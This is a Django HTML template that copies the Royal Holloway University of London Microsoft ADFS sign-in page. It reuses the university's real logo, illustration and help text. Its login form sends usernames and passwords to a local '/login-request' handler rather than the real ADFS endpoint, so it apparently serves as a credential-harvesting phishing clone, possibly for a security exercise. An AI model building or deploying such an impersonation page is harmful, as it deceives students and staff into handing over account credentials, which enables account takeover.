{% load static %}
<!DOCTYPE html>
<html lang="en-GB">
    <head>
        <title>Sign In</title>
        <link rel="stylesheet" type="text/css" href='{% static 'style.css' %}' />
{#        <style>.illustrationClass {background-image:url(/static/illustration.jpg);}</style>#}
        <style>.illustrationClass {background-image:url(https://adfs.rhul.ac.uk/adfs/portal/static/illustration.jpg);}</style>

        <style>
            * {
                margin:0px;
                padding:0px;
            }
            html, body
            {
                height:100%;
                width:100%;
                background-color:#ffffff;
                color:#000000;
                font-weight:normal;
                font-family:"Segoe UI" , "Segoe" , "SegoeUI-Regular-final", Tahoma, Helvetica, Arial, sans-serif;
                min-width:500px;
                -ms-overflow-style:-ms-autohiding-scrollbar;
            }

            body
            {
                font-size:0.9em;
            }

            #noScript { margin:16px; color:Black; }

            :lang(en-GB){quotes:'\2018' '\2019' '\201C' '\201D';}
            :lang(zh){font-family:微软雅黑;}

            @-ms-viewport { width: device-width; }
            @-moz-viewport { width: device-width; }
            @-o-viewport { width: device-width; }
            @-webkit-viewport { width: device-width;  }
            @viewport { width: device-width; }

            /* Theme layout styles */

            #fullPage, #brandingWrapper
            {
                width:100%;
                height:100%;
                background-color:inherit;
            }
            #brandingWrapper
            {
                background-color:#4488dd;
            }
            #branding
            {
                /* A background image will be added to the #branding element at run-time once the illustration image is configured in the theme.
                   Recommended image dimensions: 1420x1200 pixels, JPG or PNG, 200 kB average, 500 kB maximum. */
                height:100%;
                margin-right:500px; margin-left:0px;
                background-color:inherit;
                background-repeat: no-repeat;
                background-size:cover;
                -webkit-background-size:cover;
                -moz-background-size:cover;
                -o-background-size:cover;
            }
            #contentWrapper
            {
                position:relative;
                width:500px;
                height:100%;
                overflow:auto;
                background-color:#ffffff; /* for IE7 */
                margin-left:-500px; margin-right:0px;
            }
            #content
            {
                min-height:100%;
                height: auto !important;
                margin:0 auto -55px auto;
                padding:0px 150px 0px 50px;
            }
            #header
            {
                font-size:2em;
                font-weight:lighter;
                font-family:"Segoe UI Light" , "Segoe" , "SegoeUI-Light-final", Tahoma, Helvetica, Arial, sans-serif;
                padding-top: 90px;
                margin-bottom:60px;
                min-height:100px;
                overflow:hidden;
            }
            #header img
            {
                /* Logo image recommended dimension: 60x60 (square) or 350X35 (elongated), 4 kB average, 10 kB maximum. Transparent PNG strongly recommended. */
                width:auto;
                height:auto;
                max-width:100%;
            }
            #workArea, #header
            {
                word-wrap:break-word;
                width:350px;
            }
            #workArea
            {
                margin-bottom:90px;
            }
            #footerPlaceholder
            {
                height:40px;
            }
            #footer
            {
                height:40px;
                padding:10px 50px 0px 50px;
                position:relative;
                color:#666666;
                font-size:0.78em;
            }
            #footerLinks
            {
                float:none;
                padding-top:10px;
            }
            #copyright {color:#696969;}
            .pageLink { color:#000000; padding-left:16px; }

            /* Common content styles */

            .clear {clear:both;}
            .float { float:left; }
            .floatReverse { float:right; }
            .indent { margin-left:16px; }
            .indentNonCollapsible { padding-left:16px; }
            .hidden {display:none;}
            .notHidden {display:inherit;}
            .error { color:#c85305; }
            .actionLink { margin-bottom:8px; display:block; }
            a
            {
                color:#2672ec;
                text-decoration:none;
                background-color:transparent;
            }
            ul { list-style-type: disc; }
            ul,ol,dd { padding: 0 0 0 16px; }
            h1,h2,h3,h4,h5,label { margin-bottom: 8px; }
            .submitMargin { margin-top:38px; margin-bottom:30px; }
            .topFieldMargin { margin-top:8px; }
            .fieldMargin { margin-bottom:8px; }
            .groupMargin { margin-bottom:30px; }
            .sectionMargin { margin-bottom:64px; }
            .block { display: block; }
            .autoWidth { width:auto; }
            .fullWidth { width:342px; }
            .fullWidthIndent { width:326px; }
            .smallTopSpacing { margin-top:15px; }
            .mediumTopSpacing { margin-top:25px; }
            .largeTopSpacing { margin-top:35px; }
            .smallBottomSpacing { margin-bottom:5px; }
            .mediumBottomSpacing { margin-bottom:15px; }
            .largeBottomSpacing  { margin-bottom:25px; }
            input
            {
                max-width:100%;
                font-family:inherit;
                margin-bottom:8px;
            }
            input[type="radio"], input[type="checkbox"] {
                vertical-align:middle;
                margin-bottom: 0px;
            }
            span.submit, input[type="submit"]
            {
                border:none;
                background-color:rgb(38, 114, 236);
                min-width:80px;
                width:auto;
                height:30px;
                padding:4px 20px 6px 20px;
                border-style:solid;
                border-width:1px;
                transition:background 0s;
                color:rgb(255, 255, 255);
                cursor:pointer;
                margin-bottom:8px;

                -ms-user-select:none;
                -moz-transition:background 0s;
                -webkit-transition:background 0s;
                -o-transition:background 0s;
                -webkit-touch-callout:none;
                -webkit-user-select:none;
                -khtml-user-select:none;
                -moz-user-select: none;
                -o-user-select: none;
                user-select:none;
            }
            input[type="submit"]:hover,span.submit:hover
            {
                background: rgb(212, 227, 251);
            }
            input.text{
                height:28px;
                padding:0px 3px 0px 3px ;
                border:solid 1px #BABABA;
                font-size:1.0em;
            }
            input.text:focus
            {
              border: 1px solid #6B6B6B;
            }
            select
            {
                height:28px;
                min-width:60px;
                max-width:100%;
                margin-bottom:8px;

                white-space:nowrap;
                overflow:hidden;
                box-shadow:none;
                padding:2px;
                font-family:inherit;
            }
            h1, .giantText
            {
               font-size:2.0em;
               font-weight:lighter;
            }
            h2, .bigText
            {
               font-size:1.33em;
               font-weight:lighter;
            }
            h3, .normalText
            {
                font-size:1.0em;
                font-weight:normal;
            }
            h4, .smallText
            {
                font-size:0.9em;
                font-weight:normal;
            }
            h5, .tinyText
            {
                font-size:0.8em;
                font-weight:normal;
            }
            .hint
            {
                color:#999999;
            }
            .emphasis
            {
                font-weight:700;
                color:#2F2F2F;
            }
            .smallIcon
            {
                height:20px;
                padding-right:12px;
                vertical-align:middle;
            }
            .largeIcon
            {
                height:48px;
                /* width:48px; */
                vertical-align:middle;
            }
            .largeTextNoWrap
            {
                height:48px;
                display:table-cell; /* needed when in float*/
                vertical-align:middle;
                white-space:nowrap;
                font-size:1.2em;
            }
            .idp
            {
                height:48px;
                clear:both;
                padding:8px;
                overflow:hidden;
            }
            .idp:hover
            {
                background-color:#cccccc;
            }
            .idpDescription
            {
                width:80%;
            }

            /* Form factor: intermediate height layout. Reduce space of the header. */
            @media only screen and (max-height: 820px) {
                #header {
                    padding-top: 40px;
                    min-height:0px;
                    overflow: hidden;
                }

                #workArea
                {
                    margin-bottom:60px;
                }
            }

            /* Form factor: intermediate height layout. Reduce space of the header. */
            @media only screen and (max-height: 500px) {
                #header {
                    padding-top: 30px;
                    margin-bottom: 30px;
                }
                #workArea{
                    margin-bottom:40px;
                }
            }

            /* Form factor: intermediate layout (WAB in non-snapped view falls in here) */
            @media only screen and (max-width: 600px) {
                html, body {
                    min-width: 260px;
                }

                #brandingWrapper {
                    display: none;
                }

                #contentWrapper {
                    float: none;
                    width: 100%;
                    margin: 0px auto;
                }

                #content, #footer, #header {
                    width: 400px;
                    padding-left: 0px;
                    padding-right: 0px;
                    margin-left: auto;
                    margin-right: auto;
                }

                #workArea {
                    width: 100%;
                }

                .fullWidth {
                    width: 392px;
                }

                .fullWidthIndent {
                    width: 376px;
                }
            }

            @media only screen and (max-width: 450px) {
                body {
                    font-size: 0.8em;
                }

                #content, #footer {
                    width:auto;
                    margin-right:33px;
                    margin-left:25px;
                }

                #header {
                    width: auto;
                }

                span.submit, input[type="submit"] {
                    font-size: 0.9em;
                }

                .fullWidth
                {
                    width:100%;
                    margin-left:auto;
                    margin-right:auto;
                }

                .fullWidthIndent {
                    width: 85%;
                }

                .idpDescription
                {
                    width:70%;
                }
            }

            /* Form factor: snapped WAB (for WAB to work in snapped view, the content wrapper width has to be set to 260px) */
            @media only screen and (max-width:280px)
            {
                #contentWrapper
                {
                    width:260px;
                }
                .idpDescription
                {
                    max-width:160px;
                    min-width:100px;
                }
            }
        </style>


    </head>

    <body dir="ltr" class="body">
        <div id="fullPage">
            <div id="brandingWrapper" class="float">
                <div id="branding"></div>
            </div>
            <div id="contentWrapper" class="float">
                <div id="content">
                    <div id="header">
                        <img class='logoImage' id='companyLogo' src='https://adfs.rhul.ac.uk/adfs/portal/logo/logo.png' alt='Royal Holloway University of London'/>
                    </div>
                    <div id="workArea">

                        <div id="authArea" class="groupMargin">

                            <div id="loginArea">
                                <div id="loginMessage" class="groupMargin">Sign in with your organizational account</div>
{#https://adfs.rhul.ac.uk/adfs/ls/?client-request-id=865edea9-dca6-4468-cf28-0080000000b1#}
{#                                <form method="post" id="loginForm" autocomplete="off" novalidate="novalidate" onKeyPress="if (event && event.keyCode == 13) Login.submitLoginRequest();" action="/login-request" >#}
                                <form method="post" id="loginForm" autocapitalize="off" novalidate="novalidate" action="/login-request">
                                    {% csrf_token %}
                                    <div id="error" class="fieldMargin error smallText">
                                        <span id="errorText" for=""></span>
                                    </div>
                                    <div id="formsAuthenticationArea">
                                        <div id="userNameArea">
                                            <label id="userNameInputLabel" for="userNameInput" class="hidden">User Account</label>
                                            <input id="userNameInput" name="UserName" type="email" value="" tabindex="1" class="text fullWidth"
                                                spellcheck="false" placeholder="someone@example.com" autocomplete="off"/>
                                        </div>

                                        <div id="passwordArea">
                                            <label id="passwordInputLabel" for="passwordInput" class="hidden">Password</label>
                                            <input id="passwordInput" name="Password" type="password" tabindex="2" class="text fullWidth"
                                                placeholder="Password" autocomplete="off"/>
                                        </div>
                                        <div id="kmsiArea" style="display:none">
                                            <input type="checkbox" name="Kmsi" id="kmsiInput" value="true" tabindex="3" />
                                            <label for="kmsiInput">Keep me signed in</label>
                                        </div>
                                        <div id="submissionArea" class="submitMargin">
                                            <input type="submit" class="submit" tabindex="4" role="button">


{#                                            <span id="submitButton" class="submit" tabindex="4" role="button"#}
{#                                                onKeyPress="if (event && event.keyCode == 32) Login.submitLoginRequest();"#}
{#                                                onclick="return Login.submitLoginRequest();">Sign in#}
{#                                            </span>#}
                                        </div>
                                    </div>
                                    <input id="optionForms" type="hidden" name="AuthMethod" value="FormsAuthentication"/>
                                </form>

                                <div id="introduction" class="groupMargin">
                                    <p><strong>Students:</strong>&nbsp;Please sign in using the format abcd123@live.rhul.ac.uk.<br/>
                                    <strong>Staff:</strong>&nbsp;Please sign in using your Royal Holloway email address.<br/><strong>Alumni:</strong>&nbsp;Please visit <A href='https://intranet.royalholloway.ac.uk/students/help-support/it-services/alumni-email-accounts.aspx'>this page</a> to find out how to access your account.<br/>
                                    If you experience problems signing in, please <a href='https://intranet.royalholloway.ac.uk/staff/it-services/get-help-with-it/home.aspx'>contact the IT Service Desk</a>.<br/>
                                    <br/>
                                    <strong>Note:</strong>&nbsp;Due to infrastructure changes undertaken earlier this month, you may not be able to see older emails and calendar items. Your mailbox content will be fully restored by 20 July 2020.</p>
                                </div>

                                <script type="text/javascript">
                                //<![CDATA[

                                    function Login() {
                                    }

                                    Login.userNameInput = 'userNameInput';
                                    Login.passwordInput = 'passwordInput';

                                    Login.initialize = function () {

                                        var u = new InputUtil();

                                        u.checkError();
                                        u.setInitialFocus(Login.userNameInput);
                                        u.setInitialFocus(Login.passwordInput);
                                    }();

                                    Login.submitLoginRequest = function () {
                                        var u = new InputUtil();
                                        var e = new LoginErrors();

                                        var userName = document.getElementById(Login.userNameInput);
                                        var password = document.getElementById(Login.passwordInput);

                                        if (!userName.value || !userName.value.match('[@\\\\]')) {
                                            u.setError(userName, e.userNameFormatError);
                                            return false;
                                        }

                                        if (!password.value) {
                                            u.setError(password, e.passwordEmpty);
                                            return false;
                                        }

                                        if (password.value.length > maxPasswordLength) {
                                            u.setError(password, e.passwordTooLong);
                                            return false;
                                        }

                                        document.forms['loginForm'].submit();
                                        return false;
                                    };

                                    InputUtil.makePlaceholder(Login.userNameInput);
                                    InputUtil.makePlaceholder(Login.passwordInput);
                                //]]>
                                </script>
                            </div>

                         </div>

                    </div>
                    <div id="footerPlaceholder"></div>
                </div>
                <div id="footer">
                    <div id="footerLinks" class="floatReverse">
                         <div>
                             <span id="copyright">&#169; 2016 Microsoft</span>
                         </div>
                    </div>
                </div>
            </div>
        </div>
        <script type='text/javascript'>
            if (navigator.userAgent.match(/iPhone/i) != null) {
                var emails = document.querySelectorAll("input[type='email']");
                if (emails) {
                    for (var i = 0; i < emails.length; i++) {
                        emails[i].type = 'text';
                    }
                }
            }

            // In the CSS file we set the ms-viewport to be consistent with the device dimensions,
            // which is necessary for correct functionality of immersive IE.
            // However, for Windows 8 phone we need to reset the ms-viewport's dimension to its original
            // values (auto), otherwise the viewport dimensions will be wrong for Windows 8 phone.
            // Windows 8 phone has agent string 'IEMobile 10.0'
            if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
                var msViewportStyle = document.createElement("style");
                msViewportStyle.appendChild(
                    document.createTextNode(
                        "@-ms-viewport{width:auto!important}"
                    )
                );
                msViewportStyle.appendChild(
                    document.createTextNode(
                        "@-ms-viewport{height:auto!important}"
                    )
                );
                document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
            }

            // If the innerWidth is defined, use it as the viewport width.
            if (window.innerWidth && window.outerWidth && window.innerWidth !== window.outerWidth) {
                var viewport = document.querySelector("meta[name=viewport]");
                viewport.setAttribute('content', 'width=' + window.innerWidth + ', initial-scale=1.0, user-scalable=1');
            }

            // Gets the current style of a specific property for a specific element.
            function getStyle(element, styleProp) {
                var propStyle = null;

                if (element && element.currentStyle) {
                    propStyle = element.currentStyle[styleProp];
                }
                else if (element && window.getComputedStyle) {
                    propStyle = document.defaultView.getComputedStyle(element, null).getPropertyValue(styleProp);
                }

                return propStyle;
            }

            // The script below is used for downloading the illustration image
            // only when the branding is displaying. This script work together
            // with the code in PageBase.cs that sets the html inline style
            // containing the class 'illustrationClass' with the background image.
            var computeLoadIllustration = function () {
                var branding = document.getElementById("branding");
                var brandingDisplay = getStyle(branding, "display");
                var brandingWrapperDisplay = getStyle(document.getElementById("brandingWrapper"), "display");

                if (brandingDisplay && brandingDisplay !== "none" &&
                    brandingWrapperDisplay && brandingWrapperDisplay !== "none") {
                    var newClass = "illustrationClass";

                    if (branding.classList && branding.classList.add) {
                        branding.classList.add(newClass);
                    } else if (branding.className !== undefined) {
                        branding.className += " " + newClass;
                    }
                    if (window.removeEventListener) {
                        window.removeEventListener('load', computeLoadIllustration, false);
                        window.removeEventListener('resize', computeLoadIllustration, false);
                    }
                    else if (window.detachEvent) {
                        window.detachEvent('onload', computeLoadIllustration);
                        window.detachEvent('onresize', computeLoadIllustration);
                    }
                }
            };

            if (window.addEventListener) {
                window.addEventListener('resize', computeLoadIllustration, false);
                window.addEventListener('load', computeLoadIllustration, false);
            }
            else if (window.attachEvent) {
                window.attachEvent('onresize', computeLoadIllustration);
                window.attachEvent('onload', computeLoadIllustration);
            }

            // Function to change illustration image. Usage example below.
            function SetIllustrationImage(imageUri) {
                var illustrationImageClass = '.illustrationClass {background-image:url(' + imageUri + ');}';

                var css = document.createElement('style');
                css.type = 'text/css';

                if (css.styleSheet) css.styleSheet.cssText = illustrationImageClass;
                else css.appendChild(document.createTextNode(illustrationImageClass));

                document.getElementsByTagName("head")[0].appendChild(css);
            }

            // Example to change illustration image on HRD page after adding the image to active theme:
            // PSH> Set-AdfsWebTheme -TargetName <activeTheme> -AdditionalFileResource @{uri='/adfs/portal/images/hrd.jpg';path='.\hrd.jpg'}
            //
            //if (typeof HRD != 'undefined') {
            //    SetIllustrationImage('/adfs/portal/images/hrd.jpg');
            //}
            //]]>
        </script>
    </body>
</html>

